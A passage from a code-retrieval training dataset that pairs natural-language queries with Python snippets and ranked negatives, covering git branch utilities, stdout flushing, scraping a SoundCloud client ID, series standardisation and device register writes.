stale branches: {total_stale_branches}\\n\\n'\\\n f'Count by author:\\n{count_by_author}\\n'\n report_details = f'Details:\\n\\n{general_report}'\n\n _ = slack_request(url=ssm_parameters['slack_webhook_url'],\n headers={'Content-type': 'application/json',\n 'Authorization': f\"Bearer {ssm_parameters['slack_access_token']}\"},\n data=json.dumps({'text': report_overview})\n )\n\n _ = slack_request(url='https://slack.com/api/files.upload',\n headers={'Content-type': 'application/x-www-form-urlencoded'},\n data={'token': ssm_parameters['slack_access_token'],\n 'channels': 'GE8NS0FT5',\n 'content': report_details,\n 'title': 'Stale branches details'}\n )", "def remove_all_status_checks_on_pr_branch(org: Organization, repo: Repository,\n branches: Dict[str, Branch]) -> List[Change[str]]:\n def execute_remove_all_status_checks(change: Change[str], branch: Branch, existing_checks: Set[str]) -> Change[str]:\n print_debug(\"Removing all status checks from branch %s\" % highlight(branch.name))\n try:\n if existing_checks:\n branch.remove_required_status_checks()\n except GithubException as e:\n print_error(str(e))\n return change.failure()\n else:\n return change.success()\n\n prb = get_pr_branch(repo, branches)\n if not prb:\n return []\n\n try:\n rqs = prb.get_required_status_checks()\n except GithubException:\n # the repository has currently no status checks\n pass\n else:\n if len(rqs.contexts) > 0:\n existing_checks = set(rqs.contexts) # type: Set[str]\n return [Change(\n meta=ChangeMetadata(\n executor=execute_remove_all_status_checks,\n params=[prb, existing_checks]\n ),\n action=ChangeActions.REPLACE,\n before=\"%s checks\" % len(existing_checks),\n after=None,\n )]\n return []", "def check(user_configuration, repository_configuration, commit_message):\n logger = output.get_sub_logger('commit-msg', 'branch-pattern')\n\n logger.debug('Starting branch-pattern check...')\n\n result = checks.CheckResult()\n branch = commit_message.branch\n logger.debug('Branch: %s', branch)\n\n check_options = repository_configuration.get('branch-pattern', {})\n allowed = check_options.get('allowed', [])\n allowed.append('master') # master is always allowed\n\n logger.debug('Allowed Patterns: %s', allowed)\n\n is_allowed = any(re.match(pattern, branch) for pattern in allowed)\n result.successful = is_allowed\n if not is_allowed:\n template = \"{branch} doesn't match any allowed pattern.\"\n result.add_detail(template.format(branch=branch))\n\n return result", "def test_multiple_branches(self, tmpgitdir):\n with tmpgitdir.join('file_a.txt').open('w') as handle:\n handle.write('first file')\n\n subprocess.check_call(['git', 'add', '.'])\n subprocess.check_call(['git', 'commit', '-m', 'first'])\n\n subprocess.check_call(['git', 'checkout', '-b', 'testbranch'])\n\n with tmpgitdir.join('file_b.txt').open('w') as handle:\n handle.write('second file')\n\n subprocess.check_call(['git', 'add', '.'])\n subprocess.check_call(['git', 'commit', '-m', 'second'])\n\n assert git_head_ref_name(tmpgitdir) == 'testbranch'", "def verify_up_to_date(path, branch=\"master\"):\n\n sys.stdout.write(\" - Verifying your branch up to date:\")\n run_in_component(path, ['git', 'remote', 'update'])\n\n result = run_in_component(path, ['git', 'rev-list', 'HEAD...origin/%s' % branch, '--count'])\n count = int(result.strip())\n\n if count == 0:\n print(\" OKAY\")\n return\n\n print(\" FAILED\")\n\n raise GenericError(\"You branch is not up-to-date with remote branch: %d different commits\" % count)", "def scm_branch(self, value):\n max_characters = 256\n conditions = [validate_max_length(value, max_characters)]\n if all(conditions):\n self._update_values('scm_branch', value)\n else:\n raise InvalidValue(f'{value} is invalid. Condition max_characters must be less than or equal to '\n f'{max_characters}')" ]
[ "0.6998986", "0.66559356", "0.64833444", "0.6398546", "0.62924314", "0.6202438", "0.6100306", "0.6061971", "0.60214883", "0.5950823", "0.57404685", "0.5680982", "0.56484795", "0.5646791", "0.56122196", "0.5460472", "0.5450381", "0.54337895", "0.5420128", "0.54145825", "0.54026216", "0.53585887", "0.5280357", "0.5276135", "0.5269761", "0.51807344", "0.51750624", "0.51746446", "0.51634026", "0.5158866" ]
0.838676
0
Small helper for writing to stdout and flushing it, intended to make terminal output more compact and responsive.
def stdout(msg): sys.stdout.write(msg) sys.stdout.flush()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def pflush(*args, **kwargs):\n print(*args, **kwargs)\n sys.stdout.flush()", "def write(msg, newline=True, flush=True):\n sys.stdout.write(msg)\n if newline:\n sys.stdout.write(\"\\n\")\n if flush:\n sys.stdout.flush()", "def print_flush(msg):\n print(msg, end='')\n sys.stdout.flush()", "def _write_and_flush(self, data):\n try:\n self.stdout.write(data)\n self.stdout.flush()\n except IOError as e:\n if e.args and e.args[0] == errno.EINTR:\n # Interrupted system call. Can happpen in case of a window\n # resize signal. (Just ignore. The resize handler will render\n # again anyway.)\n pass\n else:\n raise", "def stdout_write(string):\n\tsys.stdout.write(string)\n\tsys.stdout.flush()\n\t\n\treturn None", "def nostdout():\n\n save_stdout = sys.stdout\n sys.stdout = cStringIO.StringIO()\n yield\n sys.stdout = save_stdout", "def print_stdout(command):\n sys.stdout.write(\"%s\\n\" % command)\n sys.stdout.flush()", "def flush_print(string):\n print(string)\n sys.stdout.flush()", "def redirect_stdout():\n save_stdout = sys.stdout\n sys.stdout = _TQDMFile(sys.stdout)\n yield\n sys.stdout = save_stdout", "def StdOut(self, message):\n sys.stdout.write('{0:s}\\n'.format(message))\n sys.stdout.flush()", "def flush(self) -> None:\n if not self._buffer:\n # Only flush stdout buffer. (It could be that Python still has\n # something in its buffer. -- We want to be sure to print that in\n # the correct color.)\n self.stdout.flush()\n return\n\n data = \"\".join(self._buffer)\n\n if _DEBUG_RENDER_OUTPUT:\n self.LOG.write((\"%r\" % data).encode(\"utf-8\") + b\"\\n\")\n self.LOG.flush()\n\n # Print characters one by one. This appears to be the best solution\n # in order to avoid traces of vertical lines when the completion\n # menu disappears.\n for b in data:\n written = DWORD()\n\n retval = windll.kernel32.WriteConsoleW(\n self.hconsole, b, 1, byref(written), None\n )\n assert retval != 0\n\n self._buffer = []", "def flush(self):\n if self.stderr:\n sys.__stderr__.flush()\n else:\n sys.__stdout__.flush()", "def flush(self):\n self.old_stdout.flush()", "def tprint(msg):\n sys.stdout.write(msg + '\\n')\n sys.stdout.flush()", "def tprint(msg):\n sys.stdout.write(msg + '\\n')\n sys.stdout.flush()", "def console_print(out, *args, **kwargs):\n const_charset = stream_encoding(out)\n out.write(' '.join([a.encode(cons_charset, 'replace') for a in args]))\n if kwargs.get('newline', True):\n out.write('\\n')", "def write(self, *args, **keys):\n output = self.format(*args, **keys)\n self.eol_pending = not output.endswith(\"\\n\")\n sys.stderr.flush()\n sys.stdout.write(output)\n sys.stdout.flush()", "def out(self, output, newline=True):\r\n self.stdout.write(output)\r\n if newline:\r\n self.stdout.write(os.linesep)", "def write(string):\n\n\tsys.stdout.write(string)\n\tsys.stdout.flush()", "def write_stdout(self, data):\n filt, handler = self.filter[-1]\n data, filtered = filt.filter(data)\n self._write(pty.STDOUT_FILENO, data)\n if filtered:\n self.log(\"Filter matched %d bytes\" % len(filtered))\n self.filter.pop()\n assert callable(handler)\n res = handler(filtered)\n if res:\n self.sock.sendto(res, 0, self.last_addr)", "def output(text):\n sys.stdout.write(text)", "def _dumpStdout(self, p, outputCallback):\n while p.poll() is None:\n try:\n # May raise IOError if in non-blocking mode\n l = p.stdout.read()\n outputCallback(l)\n except IOError:\n pass\n time.sleep(0.1)\n outputCallback(p.stdout.read())", "def printnflush(*args):\n if pyscheduler.verbose:\n print args\n sys.stdout.flush()", "def printer(end,message):\n\n sys.stdout.write('\\r'+message+'\\t')\n sys.stdout.flush()\n if end: sys.stdout.write('\\n')", "def _flush():\n libtcod.console_flush()", "def write(self, text):\n text = text.rstrip()\n self.fh.write('%s\\n' % (text))\n self.old_stdout.write('%s\\n' % (text))", "def write_to_terminal(self, term=None, endl=False):\n if term is None:\n term = Terminal()\n with terminal_lock:\n self._print(term)\n if endl:\n term.newline()\n term.flush()", "def write(self, text: str) -> None:\n # similar to tqdm.write()\n # https://pypi.python.org/pypi/tqdm#writing-messages\n with self._stdout_lock:\n self._clear_line()\n if isinstance(text, (str, bytes)):\n _text = to_unicode(text)\n else:\n _text = str(text)\n sys.stdout.write(f\"{_text}\\n\")\n self._cur_line_len = 0", "def enable(self):\n self.out = StringIO()\n self._stdout = sys.stdout\n sys.stdout = self.out", "def flush(self) -> None:\r\n if self.file is not None:\r\n self.file.flush()\r\n\r\n self.stdout.flush()" ]
[ "0.7578872", "0.7356564", "0.7139393", "0.7095517", "0.7022346", "0.67478865", "0.67162675", "0.6707451", "0.6658429", "0.66203755", "0.65573883", "0.6525697", "0.64456743", "0.64306766", "0.64306766", "0.6427846", "0.6423618", "0.6415727", "0.640634", "0.63921225", "0.6329775", "0.6319898", "0.62864125", "0.62707895", "0.6192294", "0.61654764", "0.6155158", "0.61168844", "0.61049473", "0.60879385" ]
0.74203354
1
Fetches the soundcloud.com main page, looks for the 'app' js file and tries to pull a client_id out of that. Returns None on failure or a string client_id on success.
def find_client_id(): stdout("Attempting to fetch a public soundcloud client ID:\n") stdout(" * Fetching main page... ") response = requests.get("http://www.soundcloud.com") stdout("HTTP %d, %d bytes\n" % (response.status_code, len(response.content))) stdout(" * Locating app.js... ") app_js_urls = re.findall("\"(http.+?[^\"]+?/app-.+?js)", response.content) stdout("found %d URLs that may be app.js.\n" % len(app_js_urls)) if len(app_js_urls) == 0: return None else: for url in app_js_urls: stdout(" * Fetching %s... " % url) response = requests.get(url) stdout("HTTP %d, %d bytes\n" % (response.status_code, len(response.content))) stdout(" * Searching for a client id... ") open("/tmp/appjs", "w").write(response.content) # Try to pick out the value for client_id, not including quotes, # anywhere in the JavaScript and do a little length sanity # checking on it. m = re.search("client_id:\"(.{16,128}?[^\"])\"", response.content) if m is None: stdout("failed!\n") return None else: client_id = m.group(1) stdout("got one! '%s'\n" % client_id) return client_id
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_client():\n client = soundcloud.Client(client_id=CLIENT_ID)\n return client", "def client_app_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"client_app_id\")", "def check_soundcloud_id(id):\n c_url = ''\n\n try:\n page = sync.get_page(SOUNDCLOUD_BASE_URL + str(id))\n except (HTTPError, URLError) as e:\n return c_url, e.code\n \n code = None\n if page:\n html = BeautifulSoup(page, 'html.parser')\n data = html.find('link', {'rel': 'canonical'})\n c_url = data['href']\n code = 200 # successful request\n\n return c_url, code", "def get_id(html):\n\ttry:\n\t\tsong_id = re.findall('soundcloud://sounds:(.*?)\"', html)[0]\n\t\treturn song_id\n\texcept IndexError:\n\t\tprint(\"\\033[91m✘ Could not find song ID\\033[0m\")\n\t\tsys.exit()", "def getAppId(server, appName, oper = 0, fileName = 'data/jsonAPPinfo.dat'):\n if oper == 0:\n JSONdata = urllib2.urlopen(url=server+\"/api/app?short_name=\"+ \\\n appName).read()\n data = json.loads(JSONdata)\n with open(fileName,'w') as outfile:\n json.dump(data, outfile)\n outfile.close()\n elif oper == 1:\n with open(fileName,'r') as outfile:\n data = json.load(outfile)\n outfile.close()\n appId = data[0]['id']\n return appId", "def get_app(args):\n logging.info(\"Getting the APP...\")\n\n try:\n if args.app_path is not None and os.path.exists(args.app_path):\n logging.info(\"Getting APP from local path '{PATH}'...\".format(PATH=args.app_path))\n app_path = args.app_path\n\n elif args.file_id is not None:\n logging.info(\"Downloading APP from Google Drive...\")\n download_file_from_google_drive(GDRIVE_API_CREDENTIALS_JSON, args.file_id, APP_ARCHIVE)\n logging.info(\"Unzipping archive with the APP file...\")\n app_path = unzip_archive(APP_ARCHIVE)\n\n else:\n logging.error(\"No valid app path provided.\")\n return None\n\n logging.info(\"App retrieved successfuly: '{PATH}'\".format(PATH=app_path))\n return app_path\n\n except Exception as e:\n logging.error(\"Error getting the app: '{ERROR}'.\".format(ERROR=e))\n return None", "def load_portal_client():\n # return globus_sdk.ConfidentialAppAuthClient(\n # app.config['PORTAL_CLIENT_ID'], app.config['PORTAL_CLIENT_SECRET'])\n return globus_sdk.ConfidentialAppAuthClient(\n app.config['PORTAL_CLIENT_ID'], app.config['PORTAL_CLIENT_SECRET'])", "def get_from(url):\r\n try:\r\n with current_app.app_context():\r\n r = requests.get(url, timeout=current_app.config[\"TIMEOUT\"])\r\n if r.status_code == 200:\r\n return r.json()\r\n return None\r\n except:\r\n return None", "def app_id(self):\n return self._app_id or self._modules['default'].data.get('application')", "def get_app(self, app_id):\n return req(self.logger, self.access_token, 'GET', '/apps/'+app_id, {})", "def _get_oembed(self, url):\n api_url = 'http://www.soundcloud.com/oembed/?url=%s&format=json' % (url)\n return self._oembed_request(api_url)", "def get_homepage(resource):\n return resource.playlist.consumer_site.domain", "def getScriptForApp(app):\n\n script = None\n if _currentPresentationManager >= 0:\n script = \\\n _PRESENTATION_MANAGERS[_currentPresentationManager].getScript(app)\n return script", "def appid(self):\n return self._item[\"appid\"]", "def get_client_script(t2_url, t2_token, id):\n response = requests.get(f\"{t2_url}/api/clusters/{id}/stackable-client-script\", headers={ \"t2-token\": t2_token })\n if(response.status_code != 200):\n log(f\"API call to get Stackable client script returned error code {response.status_code}\")\n return None\n return response.text", "def find_player_id(url):\r\n response = requests.get(url)\r\n result = PLAYER_ID_PATTERN.search(response.text)\r\n return result.group(1)", "def sso_client_id(self) -> Optional[str]:\n return pulumi.get(self, \"sso_client_id\")", "def get_client_id():\n\n return str(get_account().Get(GOA_ACCOUNT_OAUTH2, 'ClientId',\n dbus_interface=PROPERTIES))", "def get_sound_cloud_user(handler):\n user_id = handler.get_argument('user_id')\n sound_cloud_client = Petitions.instantiate_user(user_id)\n current_user = sound_cloud_client.get('/me').username\n return current_user # Improve messages. Change to Json", "def _DefaultAppId():\n return os.getenv('APPLICATION_ID', '_')", "def get_client_id() -> str:\n from .util import get_env_value, is_env_key\n client_id = cfg.client_id\n if is_env_key(client_id):\n value = get_env_value(client_id)\n if value is None:\n print(f'could not get CLIENT_ID from environment with key: {client_id[4:]}')\n input('\\npress enter to exit...')\n exit(1)\n return value\n return client_id", "def aad_client_id(self) -> Optional[str]:\n return pulumi.get(self, \"aad_client_id\")", "async def get_app(self, app_id: str) -> dict:\r\n return await self.get(API_APP.format(app_id=app_id))", "def get_id_from_url(url):\n doc_id_regex = r'.*docsend.com/view/(?P<doc_id>.*)'\n search = re.search(doc_id_regex, url)\n if search:\n doc_id = search.group('doc_id')\n return doc_id", "def _get_login_oauth_client():\n login_client_id = settings.JWT_AUTH['JWT_LOGIN_CLIENT_ID']\n try:\n return Application.objects.get(client_id=login_client_id)\n except Application.DoesNotExist:\n raise AuthFailedError( # lint-amnesty, pylint: disable=raise-missing-from\n f\"OAuth Client for the Login service, '{login_client_id}', is not configured.\"\n )", "def display_app_info(config, client, app_id):\n try:\n resp = client.get_app_full_info(config.username, app_id)\n result = resp.json()\n app_info = result[\"app_info\"]\n title = click.style(\"App Name : \", fg=\"blue\") + click.style(\n \"{}\".format(app_info[\"title\"]))\n\n if app_info[\"rating_count\"] == 0:\n rating = \"Not yet rated\"\n else:\n rating = \"{:.1f} ({} rating\".format(app_info[\"average_rating\"],\n int(app_info[\"rating_count\"]))\n if app_info[\"rating_count\"] > 1:\n rating += \"s\"\n rating += \")\"\n rating_row = click.style(\"Rating : \", fg=\"blue\") + click.style(\"{}\".format(rating))\n up_status = click.style(\"Status : \", fg=\"blue\")\n if app_info[\"is_up\"]:\n up_status += click.style(\"Up\")\n else:\n up_status += click.style(\"Down\")\n\n last_crawl_str = \"Not yet crawled\"\n if \"last_crawl\" in app_info:\n last_crawl_str = util.format_date(app_info[\"last_crawl\"])\n\n last_crawl = click.style(\"Last Crawl Time : \", fg=\"blue\") + click.style(\n \"{}\".format(last_crawl_str))\n version = click.style(\"Version : \", fg=\"blue\") + click.style(\n \"{}\".format(app_info[\"version\"]))\n\n last_updated_str = util.format_date(app_info[\"updated\"])\n last_update = click.style(\"Last Update : \", fg=\"blue\") + click.style(\n \"{}\".format(last_updated_str))\n\n availability = click.style(\"Availability : \", fg=\"blue\") + click.style(\n \"{:.2f}%\".format(app_info[\"average_uptime\"] * 100))\n\n app_url = click.style(\"Public App URL : \", fg=\"blue\") + click.style(\n \"{}\".format(app_info[\"app_url\"]))\n original_url = click.style(\"Private App URL : \", fg=\"blue\") + click.style(\n \"{}\".format(app_info[\"original_url\"]))\n category = click.style(\"Category : \", fg=\"blue\") + click.style(\n \"{}\".format(app_info[\"category\"]))\n\n desc = click.style(\"Description : \", fg=\"blue\") + click.style(\n \"{}\".format(app_info[\"description\"]))\n price = click.style(\"Price Range : \", fg=\"blue\") + click.style(\n \"{} - {} Satoshis\").format(\n app_info[\"min_price\"], app_info[\"max_price\"])\n doc_url = click.style(\"Docs URL : \", fg=\"blue\") + click.style(\n \"{}\".format(app_info[\"docs_url\"]))\n\n quick_start = click.style(\"Quick Start\\n\\n\", fg=\"blue\") + click.style(\n app_info[\"quick_buy\"])\n\n usage_docs = None\n if \"usage_docs\" in app_info:\n usage_docs = click.style(\"Detailed usage\\n\\n\", fg=\"blue\") + click.style(\n app_info[\"usage_docs\"])\n\n page_components = [title, \"\\n\",\n rating_row, up_status, availability, last_crawl, last_update, version,\n \"\\n\",\n desc, app_url, original_url, doc_url, \"\\n\",\n category, price, \"\\n\", quick_start, \"\\n\"]\n if usage_docs:\n page_components.append(usage_docs + \"\\n\")\n final_str = \"\\n\".join(page_components)\n logger.info(final_str, pager=True)\n\n except ServerRequestError as e:\n if e.status_code == 404:\n logger.info(\n \"The specified id for the app ({}) does not match any apps in the \"\n \"marketplace.\".format(app_id))\n else:\n raise e", "def current_user_id(data_client):\n try:\n return data_client.current_user().id\n except tk.HTTPError as error:\n skip_or_fail(tk.HTTPError, \"ID of current user could not be retrieved!\", error)", "def getApp(appName):\n logger.debug('[FLASKWEB /apps/<appName>] GET request for app, `%s`' % appName)\n applist = [a['name'] for a in db.getAllApps()]\n if appName in applist:\n versionList = db.getVersions(appName)\n if request.headers['Accept'] == 'application/json':\n return jsonify(dict(name=appName, versions=versionList)), 200\n else:\n return render_template(\"apps.html\", name=appName, versionList=versionList)\n else:\n return returnError(\"Application %s does not exist\" % appName, 404)", "def app_id(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"app_id\")", "def client_id(self) -> str:\n return pulumi.get(self, \"client_id\")" ]
[ "0.58945185", "0.5666564", "0.54652476", "0.5451408", "0.539826", "0.5342123", "0.53111964", "0.5309336", "0.528899", "0.52842605", "0.5255024", "0.5202958", "0.5173291", "0.5158253", "0.5108697", "0.5082016", "0.50815004", "0.50447154", "0.50221217", "0.49919608", "0.49895084", "0.49629664", "0.49581122", "0.49481586", "0.49434212", "0.49398753", "0.493413", "0.49262598", "0.49159274", "0.49097872" ]
0.8254922
0
return a new series which the mean is 0 and variance is 1
def SeriesStandard(series): mean = np.mean(series) variance = np.var(series) series = (series-mean)/variance return series
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def var(self) -> \"Stream[float]\":\n return self.agg(lambda x: np.var(x, ddof=1)).astype(\"float\")", "def variance(self):\n return 1 / self.count() * sum((number-self.average())**2 for number in self.numbers)", "def mean(vals):", "def zero_mean_unit_variance(Data):\n Mean = numpy.mean(Data, axis=0)\n Data -= Mean\n\n Std = numpy.std(Data, axis = 0)\n index = (numpy.abs(Std<10**-5))\n Std[index] = 1\n Data /= Std\n return [Data, Mean, Std]", "def sample_mean_var_ml(x):\n n = len(x)\n assert(n > 0)\n if n == 1:\n return x[0], 0\n s = 0.0\n ss = 0.0\n for i in x:\n s += i\n ss += i*i\n mu = s/n\n var = (ss/n) - mu*mu\n return mu, var", "def transform(a):\n return np.array([np.mean(a), np.std(a)])", "def _variance(self, features):\n return np.mean(np.var(features.reshape((features.shape[0], -1)), axis=1))", "def var(self):\n return self._reduce_for_stat_function(F.variance, only_numeric=True)", "def mean_and_variance(self, particles):\n mean = particles.mean(axis=0)\n mean[2] = np.arctan2(\n np.cos(particles[:, 2]).sum(),\n np.sin(particles[:, 2]).sum() \n )\n\n zero_mean = particles - mean\n for i in range(zero_mean.shape[0]):\n zero_mean[i, 2] = minimized_angle(zero_mean[i, 2])\n cov = np.dot(zero_mean.T, zero_mean) / self.num_particles\n\n return mean.reshape((-1, 1)), cov", "def variance(self):\r\n\t\t_mean = sum(self.sample)/len(self.sample)\r\n\t\treturn sum(map(lambda x: (x - _mean)**2, self.sample))/(len(self.sample) - 1)", "def normalize_series(series):\n return (series - series.mean()) / (series.max() - series.min())", "def mean(series):\n return fsum(series) / len(series)", "def variance_moving_average_time_series(series, length):\n \n # just in case the index isn't already datetime type\n series.index = pd.to_datetime(series.index)\n\n variance = series.rolling(length).var()\n\n variance.name = series.name+\"_var\"\n\n return variance", "def get_mle_variance(series, mean=None):\n\n if mean is None:\n\n mean = series.mean()\n\n return 1 / series.size * ((series - mean)**2).sum()", "def _derive_variance_(self):\n # Pure Photon Noise\n self._properties[\"var\"] = np.sqrt(self.rawdata*self.exposuretime) / self.exposuretime", "def variation_statistic(gene_data: pd.DataFrame) -> pd.Series:\n statistic = gene_data.std(axis=1) / gene_data.mean(axis=1)\n # statistic = gene_data.std(axis=1)\n # TODO How to deal with 0 expressed genes? Are they informative?????\n return statistic.replace(np.nan, 0)", "def std(self) -> \"Stream[float]\":\n return self.agg(lambda x: np.std(x, ddof=1)).astype(\"float\")", "def variance(y):\n \n # YOUR CODE HERE\n if len(y) == 0:\n return 0.\n \n return np.var(y)", "def mean(a_series):\n return float(sum(a_series) / max(len(a_series) * 1.0, 1.0))", "def unstandardize(da: xr.DataArray, mean: xr.DataArray, std: xr.DataArray):\n return (std * da) + mean", "def mean_variance_analysis(df):\n rets = np.log(df['close']/df['close'].shift(1))\n\n std = rets.std()* 252\n\n annualized_returns = rets.mean() * 252\n\n print(f'The annualized returns of the stock is {annualized_returns}, and the standard deviation of the stock is {std}')", "def mean_var_sd(x):\n n = x.size\n assert 2 <= n\n mean = x.sum() / n\n diff = x - mean\n var = np.vdot(diff, diff) / (n - 1)\n sd = var ** 0.5\n return {\n 'mean': mean,\n 'var': var,\n 'sd': sd,\n }", "def variance( values, sample=False ):\n mean_val = mean_value( values )\n n_val = len( values ) -1 if sample else len( values )\n return sum( [ j**2 for j in [ i - mean_val for i in values ] ] ) / n_val", "def stdAxisPoints(self, var):\n varID = var.id\n var = genutil.statistics.std(var, axis=\"(%s)\" % self.axis.id)\n var.id = varID\n return var", "def sample_mean_var_unbiased(x):\n n = len(x)\n assert(n > 0)\n if n == 1:\n return x[0], float('Inf')\n mean, v = sample_mean_var_ml(x)\n var = v*n/(n-1)\n return mean, var", "def get_mean_and_variance(self):\n self._set_statistics()\n return self.statistics_object.get_mean(), self.statistics_object.get_variance()", "def test_variance_of_slope_sums():\n\n ticker = 'GOOG'\n main_df = pd.read_pickle(settings.settings_dict['stock_data_path'])\n\n main_df = sample_slopes.create_slope_sum(main_df)\n\n slope_sums = main_df[ticker + \"slope_sum\"]\n\n print np.mean(main_df[ticker + \"slope_sum\"])\n print np.std(main_df[ticker + \"slope_sum\"])\n\n std = pd.rolling_std(slope_sums, window=20)\n\n _, ax2 = plt.subplots()\n\n ax2.plot(slope_sums)\n ax2.plot(slope_sums + std)\n ax2.plot(slope_sums - std)\n plt.legend(['Slope_Sum ', 'Slope_Sum +1 Std', 'Slope_Sum -1 Std'])\n plt.title(ticker + ' varrience of slope sum')\n plt.show()", "def explained_variance(returns, values):\n exp_var = 1 - torch.var(returns - values) / torch.var(returns)\n return exp_var.item()", "def test_mean_variance():\n f = np.asarray([\n [0.99, 1.0, 0.5],\n [0.69, 0.6, 0.6]])\n R = common_metrics.mean_variance(f, maximise=True)\n expected = np.asarray(\n [1.42320289996384, 1.54948632859709])\n assert np.allclose(R, expected)\n R = common_metrics.mean_variance(f, maximise=False)\n expected = np.asarray(\n [0.132210105461122, 0.351723890540445])\n assert np.allclose(R, expected)", "def test_variance(self):\n self.assertEqual(variance(list1, sample=False), np.var(list1))\n self.assertEqual(variance(list1), np.var(list1, ddof=1))" ]
[ "0.6331923", "0.60499734", "0.5981126", "0.59652394", "0.5938104", "0.5921124", "0.58709556", "0.58616686", "0.58051085", "0.57974374", "0.579102", "0.57625544", "0.5762502", "0.5761699", "0.57592386", "0.57551837", "0.5746474", "0.57087433", "0.5698675", "0.56976444", "0.5693832", "0.5690835", "0.5678038", "0.56728256", "0.56473416", "0.5631198", "0.56239617", "0.5619374", "0.56188816", "0.56057966" ]
0.64050394
0
Switch with mv_all, was inversed with mv_step.
def mv_step(self): # def mv_all(self): self.device_reg_data &= ~(0x1 << 3) bus.write_byte_data(self.device_address, self.device_reg_mode1, self.device_reg_data)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def mv_all(self):\n # def mv_step(self):\n self.device_reg_data &= ~(0x1 << 2)\n bus.write_byte_data(self.device_address, self.device_reg_mode1, self.device_reg_data)", "def step(self, move):", "def step(self, state):", "def step_forward(self):", "def step(self):\n while self.state != STATE_TERMINAL:\n self.step_strategies[self.state]()", "def moveSpecialOb(self):\n\t\tfor obJ in self.special:\n\t\t\tobJ.moveStep()", "def step(self, model):\n\n if self.active == 0:\n\n self.activate(model)\n\n elif self.active == 1:\n\n self.move(model)\n\n self.exit_query(model)\n\n self.save(model)\n\n return", "def do_step(self) -> None:", "def step(self):\n self.log.info(\"Stepping %r\", self)\n # get enabled transitions before reseting inputs\n scope_transitions = self.get_enabled_transitions_by_scope()\n\n # reset inputs/outputs at the start of a big step\n if self.enabled_inputs:\n self.log.info(\"Reseting inputs and outputs at start of big step...\")\n self.enabled_inputs = set()\n self.outputs = set()\n self.locals = set()\n\n # execute transitions\n # - note that each scope is non-overlapping by definition\n updates = dict()\n for scope, transitions in scope_transitions.items():\n if len(transitions) > 1: # non-determinism\n pass\n transition = transitions[0]\n self._execute_transition(transition, updates)\n\n # update variables\n self.variables.update(updates)\n self.log.info(\"Variables now %r\", self.variables)", "def switch_pivot():\n for piv_switcher in get_one_switcher():\n piv_switcher.switch()", "def reset_all(self):\n self._stepsize = _stepsize\n self.reset_f()\n self.reset_s()\n self.reset_u()", "def _step(self) -> None:", "def startMovementAll(self):\n self.startMovementX()\n self.startMovementY()\n self.startMovementZ()", "def _step(self):\n pass", "def decide_next_move(self):\n pass", "def step(self, action):\n x, y = self.state_to_coord(self.current_state)\n if action == self.actions['up']:\n possible_next_state = self.coord_to_state(x - 1, y)\n if x - 1 < 0 or possible_next_state in self.block_states:\n result = self.current_state, self.step_reward, False\n elif possible_next_state in self.goal_states:\n result = possible_next_state, self.goal_reward, True\n else:\n result = possible_next_state, self.step_reward, False\n elif action == self.actions['right']:\n possible_next_state = self.coord_to_state(x, y + 1)\n if y + 1 >= self.columns or possible_next_state in self.block_states:\n result = self.current_state, self.step_reward, False\n else:\n result = possible_next_state, self.step_reward, False\n\n elif action == self.actions['left']:\n possible_next_state = self.coord_to_state(x, y - 1)\n if y - 1 < 0 or possible_next_state in self.block_states:\n result = self.current_state, self.step_reward, False\n else:\n result = possible_next_state, self.step_reward, False\n\n elif action == self.actions['down']:\n possible_next_state = self.coord_to_state(x + 1, y)\n if x + 1 >= self.rows or possible_next_state in self.block_states:\n result = self.current_state, self.step_reward, False\n else:\n result = possible_next_state, self.step_reward, False\n\n else:\n raise ValueError('Expected action value in {}, received {} in state {}'.\n format(self.actions, action, self.state_to_coord(self.current_state)))\n\n self.current_state = result[0]\n return result", "def _add_switchs(self):\r\n lst = self.model.get_all_switch()\r\n\r\n for itm in lst:\r\n self._add_switch(itm)", "def step(self, action):\n\n # ==\n # Transition, reward and termination\n done = False\n reward = self.get_current_reward(self.state)\n\n # Leaf and absorbing nodes\n if self.state <= 1:\n done = True\n if self.state == 1:\n self.state = 0 # go to absorbing\n else:\n self.state = int(self.state // 2)\n\n # ==\n # Features\n phi = self.state_2_features(self.state)\n\n return phi, reward, done, {}", "def step(self, action):", "def stopMovementAll(self):\n self.stopMovementX()\n self.stopMovementY()\n self.stopMovementZ()", "def step_to(self, inp, out):\n for new_state in self.current_state.transitions[inp]:\n if new_state[0] == out:\n self.current_state = new_state[1]\n return out\n return None", "def step(self,inp): ## function responsible for exciting the machine with a SINGLE INPUT VALUE\n (s, o) = self.getNextValues(self.state,inp)\n # will store the state and return the output\n self.state =s\n return o", "def step(self, action: CARLAAction, *args: Any, **kwargs: Any) -> Transition:\n observation, reward, done, info = self.env.step(action)\n if observation[\"lane_invasion\"] > 0:\n logging.debug(\"A lane was invaded\")\n done = True\n reward = -1.0\n return observation, reward, done, info", "def next_step(self):\n _modeller.mod_state_optimizer_next_step(self._modpt)", "def vizualize(self, moves):\n for move in moves:\n if move == 'L':\n self.go_left()\n elif move == 'R':\n self.go_right()\n elif move == 'D':\n self.go_down()\n elif move == 'U':\n self.go_up()", "def move(self): # AH note. Swich move with extra_steps?\n if self.adjustment < 0:\n self.position += self.extra_steps\n super().move()\n self.no_moves += 1\n # Do the regular move", "def step(self):\n if not self.is_done():\n actions = [ agent.program(self.percept(agent)) for agent in self.agents ]\n for agent, action in zip(self.agents, actions):\n self.execute_action(agent, action)\n\n self.exogenous_change()", "def advance_state_machine():\n global state_num\n\n if state_num == 0:\n brighter_switch(jess, \"orange\")\n dimmer_switch(ness, \"red\")\n dimmer_switch(tess, \"green\")\n state_num = 1\n\n elif state_num == 1:\n brighter_switch(ness, \"red\")\n dimmer_switch(jess, \"orange\")\n dimmer_switch(tess, \"green\")\n\n state_num = 2\n\n else:\n brighter_switch(tess, \"green\")\n dimmer_switch(ness, \"red\")\n dimmer_switch(jess, \"orange\")\n\n state_num = 0", "def step(self, move):\r\n self.board.push_uci(move)\r\n self.num_halfmoves += 1", "def replay_steps(s):\n if s is None:\n print \"nothing to do\"\n return\n for (addr,action,arg) in s:\n action(arg)" ]
